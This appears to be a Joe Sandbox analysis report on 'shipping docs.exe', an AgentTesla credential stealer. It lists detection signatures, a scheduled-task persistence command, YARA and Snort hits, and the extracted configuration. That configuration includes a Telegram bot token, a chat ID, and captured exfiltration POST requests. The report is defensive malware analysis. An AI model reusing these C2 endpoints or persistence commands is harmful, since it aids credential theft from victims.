Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
shipping docs.exe

Overview

General Information

Sample Name:shipping docs.exe
Analysis ID:756232
MD5:6308ae755a893c15a989b1ccf2c56393
SHA1:00ada70aa14a5cf26a7f8cecbaaa437267d30a2a
SHA256:9dfdb5048599b1083fe534cf5fe5a0440d71eb74b5497e506f0a0a4c23821f40
Tags:agentteslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Sigma detected: Scheduled temp file as task from temp location
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • shipping docs.exe (PID: 2400 cmdline: C:\Users\user\Desktop\shipping docs.exe MD5: 6308AE755A893C15A989B1CCF2C56393)
    • schtasks.exe (PID: 5248 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmp7934.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 5220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • yVGAJfiVEvtg.exe (PID: 4552 cmdline: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe MD5: 6308AE755A893C15A989B1CCF2C56393)
    • schtasks.exe (PID: 4792 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmpF5B7.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 4536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • yVGAJfiVEvtg.exe (PID: 3680 cmdline: {path} MD5: 6308AE755A893C15A989B1CCF2C56393)
  • VMqTMMD.exe (PID: 1280 cmdline: "C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe" MD5: 6308AE755A893C15A989B1CCF2C56393)
  • VMqTMMD.exe (PID: 3124 cmdline: "C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe" MD5: 6308AE755A893C15A989B1CCF2C56393)
    • schtasks.exe (PID: 4184 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmp3418.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 4404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • VMqTMMD.exe (PID: 5228 cmdline: {path} MD5: 6308AE755A893C15A989B1CCF2C56393)
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/sendMessage?chat_id=1644584536"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.343723068.0000000002D38000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000000.00000002.270616747.00000000034A9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000000.00000002.270616747.00000000034A9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
        00000000.00000002.270616747.00000000034A9000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
        • 0x15b63d:$a13: get_DnsResolver
        • 0x191c5d:$a13: get_DnsResolver
        • 0x159d4a:$a20: get_LastAccessed
        • 0x19036a:$a20: get_LastAccessed
        • 0x15c06b:$a27: set_InternalServerPort
        • 0x19268b:$a27: set_InternalServerPort
        • 0x15c3a0:$a30: set_GuidMasterKey
        • 0x1929c0:$a30: set_GuidMasterKey
        • 0x159e5c:$a33: get_Clipboard
        • 0x19047c:$a33: get_Clipboard
        • 0x159e6a:$a34: get_Keyboard
        • 0x19048a:$a34: get_Keyboard
        • 0x15b237:$a35: get_ShiftKeyDown
        • 0x191857:$a35: get_ShiftKeyDown
        • 0x15b248:$a36: get_AltKeyDown
        • 0x191868:$a36: get_AltKeyDown
        • 0x159e77:$a37: get_Password
        • 0x190497:$a37: get_Password
        • 0x15a992:$a38: get_PasswordHash
        • 0x190fb2:$a38: get_PasswordHash
        • 0x15ba9f:$a39: get_DefaultCredentials
        00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Click to see the 28 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          3.0.shipping docs.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            3.0.shipping docs.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              3.0.shipping docs.exe.400000.0.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
              • 0x34a4b:$s10: logins
              • 0x344c5:$s11: credential
              • 0x3072c:$g1: get_Clipboard
              • 0x3073a:$g2: get_Keyboard
              • 0x30747:$g3: get_Password
              • 0x31af7:$g4: get_CtrlKeyDown
              • 0x31b07:$g5: get_ShiftKeyDown
              • 0x31b18:$g6: get_AltKeyDown
              3.0.shipping docs.exe.400000.0.unpackWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
              • 0x31f0d:$a13: get_DnsResolver
              • 0x3061a:$a20: get_LastAccessed
              • 0x3293b:$a27: set_InternalServerPort
              • 0x32c70:$a30: set_GuidMasterKey
              • 0x3072c:$a33: get_Clipboard
              • 0x3073a:$a34: get_Keyboard
              • 0x31b07:$a35: get_ShiftKeyDown
              • 0x31b18:$a36: get_AltKeyDown
              • 0x30747:$a37: get_Password
              • 0x31262:$a38: get_PasswordHash
              • 0x3236f:$a39: get_DefaultCredentials
              0.2.shipping docs.exe.35d2730.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                Click to see the 7 entries

                Sigma Signatures

                Persistence and Installation Behavior

                barindex
                Sigma detected: Scheduled temp file as task from temp location
                Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmp7934.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmp7934.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\shipping docs.exe, ParentImage: C:\Users\user\Desktop\shipping docs.exe, ParentProcessId: 2400, ParentProcessName: shipping docs.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmp7934.tmp, ProcessId: 5248, ProcessName: schtasks.exe

                Snort Signatures

                Timestamp:192.168.2.3149.154.167.220496994432851779 11/29/22-21:19:34.793087
                SID:2851779
                Source Port:49699
                Destination Port:443
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3149.154.167.220497004432851779 11/29/22-21:20:32.964256
                SID:2851779
                Source Port:49700
                Destination Port:443
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3149.154.167.220497014432851779 11/29/22-21:20:48.592868
                SID:2851779
                Source Port:49701
                Destination Port:443
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: shipping docs.exeReversingLabs: Detection: 73%
                Source: shipping docs.exeVirustotal: Detection: 47%Perma Link
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeReversingLabs: Detection: 73%
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeReversingLabs: Detection: 73%
                Machine Learning detection for sample
                Source: shipping docs.exeJoe Sandbox ML: detected
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeJoe Sandbox ML: detected
                Source: 3.0.shipping docs.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                Source: 3.0.shipping docs.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/sendMessage?chat_id=1644584536"}
                Source: shipping docs.exe.3776.3.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/sendMessage"}
                Source: shipping docs.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49699 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49700 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49701 version: TLS 1.2
                Source: shipping docs.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Networking

                barindex
                Snort IDS alert for network traffic
                Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49699 -> 149.154.167.220:443
                Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49700 -> 149.154.167.220:443
                Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49701 -> 149.154.167.220:443
                Uses the Telegram API (likely for C&C communication)
                Source: unknownDNS query: name: api.telegram.org
                Source: unknownDNS query: name: api.telegram.org
                Source: unknownDNS query: name: api.telegram.org
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: global trafficHTTP traffic detected: POST /bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dad24f67b2ac65Host: api.telegram.orgContent-Length: 1006Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dad24f8bdcd188Host: api.telegram.orgContent-Length: 1006Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dad24f9334eaaaHost: api.telegram.orgContent-Length: 1006Expect: 100-continueConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                Source: shipping docs.exe, 00000003.00000002.518422910.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                Source: VMqTMMD.exe, 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
                Source: VMqTMMD.exe, 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://Unbjpy.com
                Source: shipping docs.exe, 00000003.00000002.534617829.000000000334B000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.537871887.00000000034AF000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.534906198.0000000003201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: shipping docs.exe, 00000003.00000002.514223306.0000000001202000.00000004.00000020.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.515645091.0000000001361000.00000004.00000020.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.512897668.0000000001029000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: shipping docs.exe, 00000000.00000003.239628147.0000000000BDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://en.w
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240423951.000000000548B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                Source: shipping docs.exe, 00000000.00000002.265489624.0000000002481000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000003.00000002.534292549.0000000003336000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000004.00000002.364468167.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 0000000F.00000002.373989607.0000000002D06000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.537543749.000000000349A000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.534577687.00000000031EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: shipping docs.exe, 00000000.00000003.242487064.0000000005480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.245303030.0000000005479000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.245545950.000000000547D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: shipping docs.exe, 00000000.00000003.245303030.0000000005479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers-
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: shipping docs.exe, 00000000.00000003.264268952.0000000005470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comgrita
                Source: shipping docs.exe, 00000000.00000003.264268952.0000000005470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comm
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240126460.000000000548B000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240159233.000000000548B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: shipping docs.exe, 00000000.00000003.240136652.0000000005494000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240113755.0000000005493000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com8
                Source: shipping docs.exe, 00000000.00000003.240136652.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.comtteJ
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.241799498.00000000054AD000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.241823423.0000000005474000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.242049495.0000000005479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: shipping docs.exe, 00000000.00000003.241799498.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn%
                Source: shipping docs.exe, 00000000.00000003.242044098.0000000005474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: shipping docs.exe, 00000000.00000003.241823423.0000000005474000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.242158018.000000000547B000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.242049495.0000000005479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnlJ
                Source: shipping docs.exe, 00000000.00000003.241799498.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnu-h
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.243601775.0000000005474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: shipping docs.exe, 00000000.00000003.243601775.0000000005474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/$
                Source: shipping docs.exe, 00000000.00000003.243601775.0000000005474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/=
                Source: shipping docs.exe, 00000000.00000003.243601775.0000000005474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y
                Source: shipping docs.exe, 00000000.00000003.243601775.0000000005474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                Source: shipping docs.exe, 00000000.00000003.243601775.0000000005474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/O
                Source: shipping docs.exe, 00000000.00000003.243601775.0000000005474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ko
                Source: shipping docs.exe, 00000000.00000003.239908062.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240179699.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240220486.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.239881609.0000000005491000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240113755.0000000005493000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.s.$
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240049534.0000000005494000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.239908062.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240150934.0000000005494000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240179699.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240220486.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.239973997.0000000005494000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240136652.0000000005494000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.239881609.0000000005491000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.239942097.0000000005494000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240113755.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240076834.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: shipping docs.exe, 00000000.00000003.239908062.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240179699.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240220486.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.239881609.0000000005491000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240113755.0000000005493000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comteP$
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: shipping docs.exe, 00000000.00000003.241289310.0000000005479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.krT
                Source: shipping docs.exe, 00000000.00000003.241289310.0000000005479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.krigh
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240459510.000000000548B000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240423951.000000000548B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: VMqTMMD.exe, 00000015.00000002.533512375.00000000031B2000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.534481256.00000000031E8000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.534906198.0000000003201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://JIQ1JKgQReGyOBe.com
                Source: shipping docs.exe, 00000003.00000002.534292549.0000000003336000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.537543749.000000000349A000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.534577687.00000000031EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: shipping docs.exe, 00000003.00000002.518422910.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/
                Source: VMqTMMD.exe, 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/1644584536%discordapi%yyy
                Source: shipping docs.exe, 00000003.00000002.534292549.0000000003336000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.537543749.000000000349A000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.534577687.00000000031EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/sendDocument
                Source: shipping docs.exe, 00000003.00000002.534292549.0000000003336000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.537543749.000000000349A000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.534577687.00000000031EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4
                Source: shipping docs.exe, 00000003.00000002.518422910.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                Source: unknownHTTP traffic detected: POST /bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dad24f67b2ac65Host: api.telegram.orgContent-Length: 1006Expect: 100-continueConnection: Keep-Alive
